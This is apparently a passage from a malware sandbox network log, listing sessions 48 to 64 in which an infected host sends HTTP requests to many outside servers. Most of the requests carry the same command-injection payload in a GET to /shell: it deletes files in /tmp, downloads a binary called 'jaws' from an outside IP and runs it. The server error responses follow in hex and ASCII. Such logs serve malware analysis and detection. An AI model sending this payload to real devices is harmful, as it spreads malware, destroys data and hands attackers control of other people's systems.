                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:17.100327015 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 34 32 64 32 64 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 37 37 26 23 34 36 3b 32 30 33 37 61 35 31 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;942d2d17&#46;1706279477&#46;2037a51c</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            48192.168.2.233297273.223.88.24980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:16.960027933 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:17.146297932 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            49192.168.2.234374854.69.13.2880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:16.977418900 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:17.160685062 CET292INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            50192.168.2.235571496.7.144.13180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:17.001022100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:17.204607964 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 38 30 64 64 35 38 26 23 34 36 3b 31 37 30 36 32 37 39 34 37 37 26 23 34 36 3b 36 31 63 36 65 32 30 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;c80dd58&#46;1706279477&#46;61c6e203</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            51192.168.2.233571823.194.29.14480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:17.004705906 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:17.212172985 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 33 63 31 32 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 34 37 37 26 23 34 36 3b 33 30 33 32 63 66 35 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;83c1202&#46;1706279477&#46;3032cf5d</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            52192.168.2.235068861.238.90.22780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:17.092094898 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:17.386817932 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            53192.168.2.233314438.238.9.3580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:17.425409079 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:17.898905993 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            54192.168.2.2347000167.82.11.16680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.051240921 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:18.154053926 CET167INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Length: 11
                                                            content-type: text/plain; charset=utf-8
                                                            x-served-by: cache-pdk-kfty2130028
                                                            Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            55192.168.2.2332932192.145.232.19880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.095689058 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:18.242844105 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.25.3
                                                            Date: Fri, 26 Jan 2024 14:31:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            56192.168.2.234616420.157.170.4980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.152179956 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:18.355787039 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:17 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            57192.168.2.23430588.209.240.1380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.206989050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:18.466540098 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            58192.168.2.234903843.248.130.25480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.303147078 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            59192.168.2.2344052165.95.154.15880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.585022926 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:18.706096888 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:18 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            60192.168.2.2355670142.252.201.24780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.623898029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:18.781757116 CET322INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:27:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            61192.168.2.233903289.117.50.16080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.793714046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:19.002523899 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            62192.168.2.2355240107.148.114.6580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.915143013 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:19.206465960 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            63192.168.2.2360742154.38.87.5680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:18.937001944 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:19.250190973 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            64192.168.2.236042623.8.146.16980
                                                            TimestampBytes transferredDirectionData
